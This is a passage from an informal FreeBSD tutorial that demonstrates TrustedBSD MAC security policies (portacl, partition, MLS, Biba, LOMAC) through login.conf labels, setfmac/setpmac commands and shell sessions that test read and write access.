$ nc -l -p 1000
Can't grab 0.0.0.0:1000 with bind : Permission denied
^^^ mac.portacl allows port 1000 binding while ip.portrange.reservedhigh doesn't
$ nc -l -p 1010
^^^ works due to our firewall rule

NOTE: A basic security policy would be:
# cat rc.mac_portacl
#!/bin/sh
rules="uid:2000:tcp:79,uid:2000:tcp:80"
# allow uid 2000 to bind to port 79 and 80

sysctl net.inet.ip.portrange.reservedlow=0
sysctl net.inet.ip.portrange.reservedhigh=50
# first 50 ports are accessible only by root
sysctl security.mac.portacl.port_high=1023
# our policy works for 50 -> 1023
sysctl security.mac.portacl.suser_exempt=1
# root doesn't need the policy
sysctl security.mac.portacl.rules=$rules

E. mac_test

Tests the mac framework, finds corrupt labels amongst other things.

# kldload mac_test
# sysctl security.mac.test
security.mac.test.enabled: 1
security.mac.test.slot: 2
security.mac.test.init_count_bpfdesc: 0
security.mac.test.init_count_cred: 1920
security.mac.test.init_count_devfsdirent: 0
security.mac.test.init_count_ifnet: 0
...
(big output)


F. mac_none

No effect.

# kldload mac_none

G. mac_stub

Sample policy that does nothing (man 4 mac_stub)

# kldload mac_stub

3. Advanced policies
====================

These policies need labelling. (man 7 maclabel, man 4 mac)

setfmac, setfsmac - set file system labels
setpmac - set process mac
ifconfig - set network interface label
login.conf - set tty/user label

I. login.conf labelling:

Example for the mac_partition and mac_mls policy:

insecure:\
:copyright=/etc/COPYRIGHT:\
:welcome=/etc/motd:\
:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
:path=~/bin /bin /usr/bin /usr/local/bin:\
:manpath=/usr/share/man /usr/local/man:\
:nologin=/var/run/nologin:\
:cputime=1h30m:\
:datasize=8M:\
:vmemoryuse=100M:\
:stacksize=2M:\
:memorylocked=4M:\
:memoryuse=8M:\
:filesize=8M:\
:coredumpsize=8M:\
:openfiles=24:\
:maxproc=32:\
:priority=0:\
:requirehome:\
:passwordtime=90d:\
:umask=002:\
:ignoretime@:\
:label=partition/13,mls/5:

^^^ We create a new label in login.conf named insecure
(don't forget to run cap_mkdb /etc/login.conf after that)

# pw user mod new -L insecure
^^^ we set the user's label to insecure

II. ifconfig labelling:

# ifconfig rl0 maclabel 'biba/high(low-high)'
^^^ set high for incomming packets and all for outgoing

III. setfmac, setfsmac labelling:

Boot to single user to enable multilabelling: (man 8 tunefs)

# tunefs -l enable /; tunefs -l enable /home

Exit single user and test:

# ls -lZa test
-rw-r--r-- 1 root new mls/low 0 Apr 6 16:01 test
# setfmac mls/equal test
# getfmac test
test: mls/equal
# tail -n 1 mls-policy.txt
/home/new/test mls/high
# setfsmac -f mls-policy.txt test
setfsmac: mls-policy.txt: read 23 specifications
# getfmac test
test: mls/high

We are set:

$ pw user show new | awk -F\: '{ print $5 }'
insecure
^^^ user new's label is insecure
$ id -P
new:*:2000:2000:insecure:0:0:User &:/home/new:/bin/sh


A. mac_partition

# kldload mac_partition
# top

$ id -u
2000
$ ps -Za|grep top
^^^ we can't see top as the insecure user

# killall -9 top

# setpmac partition/13 top
^^^ we label top to our label

$ ps -Z
LABEL PID TT STAT TIME COMMAND
partition/13 4701 v1 SL 0:00.07 -su (sh)
partition/13 4783 v1 RL+ 0:00.00 ps -Z
$ ps -ZU root
partition/13 976 p3 S+ 0:00.02 top
^^^ we can see top now (even if owned by root)

You can disable all services from /etc/rc.conf and make a script to launch them
manually with proper labelling. (Why should an insecure user see cron running?)
Or even mess with the login scripts:

# setpmac partition/50 bash
# id -u
0
# pw user show root
root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
# ps Zax
LABEL PID TT STAT TIME COMMAND
partition/50 1136 p3 S 0:00.06 bash
partition/50 1169 p3 R+ 0:00.00 ps Zax
^^^ even root can only see his own partition processes

B. mac_mls

mac_mls prevents the downward flow of information

Set default's label to "mls/equal(equal-equal)" and insecure's label to "mls/5(5-5)"
in /etc/login.conf (Do: cap_mkdb /etc/login.conf). Add "mac_mls_load="YES"" to
/boot/loader.conf. Reboot.

$ id -u
2000
$ getpmac
mls/5(5-5)
$ ls -lZ /dev/kmem
ls: /dev/kmem: Permission denied
^^^ filesystem protection is in place

# echo s > test1; echo e > test2; echo x > test3
# getfmac test2
test: mls/equal
# setfmac mls/1 test1; setfmac mls/10 test3
# chown new:new test?

Observation test:

$ ls test?
ls: test3: Permission denied
test1 test2
^^^ we can't observe higher clearance level

Read test:

$ cat test?
s
e
cat: test3: Permission denied
^^^ higher clearance level dissallows read

Write test:

$ echo 1 > test1
cannot create test1: Permission denied
$ echo 1 > test2
$ echo 1 > test3

$ cat test?
1
e
cat: test3: Permission denied
# cat test3
1
^^^ we can write to equal or higher, but not lower

NOTE: lower clearance can't observe higher clearance processes
A basic policy would be to enforce mls/high on everything not to be
read (even if it needs to be written) mls/low on everything not to be
written (even if it needs to be read) and mls/equal on the rest. Any
insecure users should be labelled mls/low.

C. mac_biba

mac_biba prevents the upward flow of information

For this, the default label in /etc/login.conf will be "biba/equal(equal-equal)",
insecure's label will be "biba/5". Run "cap_mkdb /etc/login.conf" also add
mac_biba_load="YES" to loader.conf. Reboot.

$ id -u
2000
$ getpmac
biba/5(5-5)
$ ls -lZ /dev/kmem
crw-r----- 1 root kmem biba/high 2, 1 Apr 7 08:23 /dev/kmem
^^^ filesystem protection is in place

Let the tests begin:

# echo s > test1; echo e > test2; echo x > test3; echo o > test4; echo r > test5
# getfmac test2
test2: biba/high
# setfmac biba/2 test1; setfmac biba/4 test2; setfmac biba/5 test3; setfmac biba/6 test4; setfmac biba/9 test5
# chown new:new test?

Observation test:

$ ls test?; echo; cat test?
ls: test1: Permission denied
ls: test2: Permission denied
test3 test4 test5

cat: test1: Permission denied
cat: test2: Permission denied
x
o
r
^^^ a higher integrity subject can't observe or read a lower integrity object

Write test:

$ echo 1 > test1
$ echo 1 > test2
$ echo 1 > test3
$ echo 1 > test4
cannot create test4: Permission denied
$ echo 1 > test5
cannot create test5: Permission denied
$ cat test?
cat: test1: Permission denied
cat: test2: Permission denied
1
o
r
^^^ a lower integrity subject can't write to a higher integrity subject

D. mac_lomac (man 4 mac_lomac)

While mac_biba denies access to lower integrity objects, mac_lomac
permits access to them, but downgrades the integrity level thus not
violating the integrity rules. (yes I've taken this from the man page)

See section 5. (Notes) part IV. for details about why I didn't explain this policy.

4. Full example
===============

I. Preparation:

We will use the following policies to build a secure environment on a FreeBSD 5.2.1 workstation:

mac_seeotheruids, mac_partition, mac_mls, mac_biba

We boot in single user mode and "tunefs -l enable" all partitions.

We add the following modules to loader.conf and then reboot:

# tail -n 6 /boot/loader.conf
mac_biba_load="YES"
mac_mls_load="YES"
mac_seeotheruids_load="YES"
mac_partition_load="YES"


# kldstat | grep mac
4 1 0xc070d000 7cdc mac_biba.ko
5 1 0xc0715000 7e5c mac_mls.ko
9 1 0xc21e0000 2000 mac_seeotheruids.ko
12 1 0xc21e9000 2000 mac_partition.ko
^^^ Modules are loaded

We edit /etc/login.conf and add the following lines:

# tail -n 25 /etc/login.conf

insecure:\
:copyright=/etc/COPYRIGHT:\
:welcome=/etc/motd:\
:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
:path=~/bin /bin /usr/bin /usr/local/bin:\
:manpath=/usr/share/man /usr/local/man:\
:nologin=/var/run/nologin:\
:cputime=1h30m:\
:datasize=8M:\
:vmemoryuse=100M:\
:stacksize=2M:\
:memorylocked=4M:\
:memoryuse=8M:\
:filesize=8M:\
:coredumpsize=8M:\
:openfiles=24:\
:maxproc=32:\
:priority=0:\
:requirehome:\
:passwordtime=90d:\
:umask=002:\
:ignoretime@:\
:label=mls/15(15-15),biba/15(15-15),partition/15:

We also label the default class in order not to interfere with us:

# cat /etc/login.conf|grep -A 25 "default:\\\\" | grep label
:label=mls/equal,biba/equal,partition/equal:

# cap_mkdb /etc/login.conf

# adduser
Username: new
Full name: test user
Uid (Leave empty for default): 2000
Login group [new]:
Login group is new. Invite new into other groups? []:
Login class [default]: insecure
Shell (sh csh tcsh bash nologin) [sh]: bash
Home directory [/home/new]:
Use password-based authentication? [yes]:
Use an empty password? (yes/no) [no]:
Use a random password? (yes/no) [no]: yes
Lock out the account after creation? [no]:
Username : new
Password :
Full Name : test user
Uid : 2000
Class : insecure
Groups : new
Home : /home/new
Shell : /bin/bash
Locked : no
OK? (yes/no): yes
adduser: INFO: Successfully added (new) to the user database.
adduser: INFO: Password for (new) is: VOdCyK11E2p
Add another user? (yes/no): no
Goodbye!

# su -s - new
$ id -u
2000
^^^ from now "$" is the new user and "#" is root
$ pw user show new
new:*:2000:2000:insecure:0:0:test user:/home/new:/bin/bash

II. Implementation and tests:

$ getpmac
biba/15(15-15),mls/15(15-15),partition/15

# setpmac partition/15,mls/equal top
Note: the top process will be killed before we start another top process.

A. mac_seeotheruids test

$ ps Zax
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.03 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1101 #C: R+ 0:00.01 ps Zax
^^^ we can't see processes except our own

B. mac_partition test

# sysctl sysctl security.mac.seeotheruids.enabled=0
^^^ it will remain off for the rest of the example

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/equal(low-high),mls/equal(low-high),partition/15 1122 #C: S+ 0:00.02 top
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.05 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1123 #C: R+ 0:00.01 ps Zax
^^^ we can now see all processes in our partition (15)

C. mac_biba and mac_mls test

# setpmac partition/15,mls/equal,biba/high\(high-high\) top

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/high(high-high),mls/equal(low-high),partition/15 1251 #C: S+ 0:00.02 top
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.06 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1157 #C: R+ 0:00.00 ps Zax
^^^ biba allows us to read higher labelled objects

# setpmac partition/15,mls/equal,biba/low top

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.07 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1226 #C: R+ 0:00.01 ps Zax
^^^ biba doesn't allow lower labelled objects to be read (mls does!)

$ ifconfig rl0 | grep maclabel
maclabel biba/low(low-low),mls/low(low-low)
$ ping -c 1 66.218.71.114
PING 66.218.71.114 (66.218.71.114): 56 data bytes
ping: sendto: Permission denied
^^^ everyone pings yahoo.com
You can set the default interface label to an insecure one (for testing purposes)
Add security.mac.biba.trust_all_interfaces=1 to sysctl.conf
This is caused due to the default policy label in the biba policy. Taken from:
(http://lists.freebsd.org/pipermail/freebsd-security/2003-September/000923.html)

# ifconfig rl0 maclabel biba/equal\(low-high\),mls/equal\(low-high\)
$ ping -c 1 66.218.71.114
PING 66.218.71.114 (66.218.71.114): 56 data bytes
64 bytes from 66.218.71.114: icmp_seq=0 ttl=50 time=204.455 ms

--- 66.218.71.114 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 204.455/204.455/204.455/0.000 ms
^^^ pinging works now

# touch test1 test2 test3 test4 test5
# getfmac test1
test1: biba/equal,mls/equal
# setfmac biba/low test1 test2; setfmac biba/high test4 test5; setfmac mls/low test1 test3; setfmac mls/high test2 test4
^^^ can you keep up? :)
# setfmac mls/equal,biba/equal test3
# getfmac test?
test1: biba/low,mls/low
test2: biba/low,mls/high
test3: biba/equal,mls/equal
test4: biba/high,mls/high
test5: biba/high,mls/equal
# chown new:new test?
^^^ owned by our user

Observation/read test:

$ ls
test1 test2 test3 test4 test5
$ ls test?
ls: test1: Permission denied
ls: test2: Permission denied
ls: test4: Permission denied
test3 test5
^^^ we can't observe pairs (biba/low,mls/low) (biba/low,mls/high) and (biba/high,mls/high)
(and of course, we can't read them)

Writting test:

$ for i in `echo test*`; do echo 1 > $i; done
-su: test1: Permission denied
-su: test4: Permission denied
-su: test5: Permission denied
^^^ we can write to pairs (biba/low,mls/high) and (biba/equal,mls/equal)
$ cat test?
cat: test1: Permission denied
cat: test2: Permission denied
1
cat: test4: Permission denied
# cat test2
1
^^^ yep, worked

III. Conclusion:
A good security system will have good biba/lomac/mls policies, see
http://www.watson.org/~robert/freebsd/lomac-policy.contexts for an example.
Download file, edit it to suid your needs and then run:

# setfsmac -ef lomac-policy.contexts /

5. Notes
========

I. I had problem when unloading module mac_partition after playing with labelling:

module_register_init: MOD_LOAD (mac_partition, 0xc04c3480, 0xc2114e20) error 12

^^^ after this I can't load the module anymore.

II. Running startx as with as mls/equal(equal-equal) (biba/equal, lomac/equal) allows us to su
into a lowclass/highclass user: (run from xterm)

# getpmac
mls/equal(equal-equal)
# su - new
$ getpmac
mls/equal(equal-equal)
# su -s - new
$ getpmac
mls/low(low-low)

III. If subjects can read an object, they can also execute it.
# echo ls > test1; echo ls > test2; echo ls > test3; echo ls > test4; echo ls > test5
# setfmac biba/2 test1; setfmac biba/4 test2; setfmac biba/5 test3; setfmac biba/6 test4; setfmac biba/9 test5
# chmod +x test?

$ getpmac
biba/5(equal-equal)
$ ./test1
./test1: Permission denied
$ ./test2
./test2: Permission denied
$ ./test3
test1 test2 test3 test4 test5
$ ./test4
test1 test2 test3 test4 test5
$ ./test5
test1 test2 test3 test4 test5

IV. mac_lomac
I wasn't able to load this policy, so I couldn't test it.
In login.conf I've set: "lomac/equal" to default class and
"lomac/15" to insecure class. In messages I get:

Apr 7 09:47:12 illusion kernel: Preloaded elf module "/boot/kernel/mac_lomac.ko" at 0xc077a4bc.
Apr 7 09:47:12 illusion kernel: Security policy loaded: TrustedBSD MAC/LOMAC (mac_lomac)

The module is loaded:

# kldstat | grep mac_lomac
6 1 0xc071d000 951c mac_lomac.ko

Files don't have default labelling:

# getfmac /dev/kmem
/dev/kmem: mls/high

And I can't label files:

# setfmac lomac/equal test2; getfmac test2
test2: mls/equal

6. Links of the day
===================

TrustedBSD: http://www.trustedbsd.org
FreeBSD security: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/security.html

7. Last words
=============

This tutorial is in alpha state so please send me comments to bugghy@rootshell.be

THE USUAL DISCLAIMER:
- ---------------------
This file is for [of course] informational purposes only. I
don't take responsibility for anything anyone does after reading this file.

DOCUMENTATION
=============

man pages
http://www.freebsd.org (FBSD site)
trial and error
own experience
my own mind (yeah ... sure)

- -----------------------------------------------------------

Read More......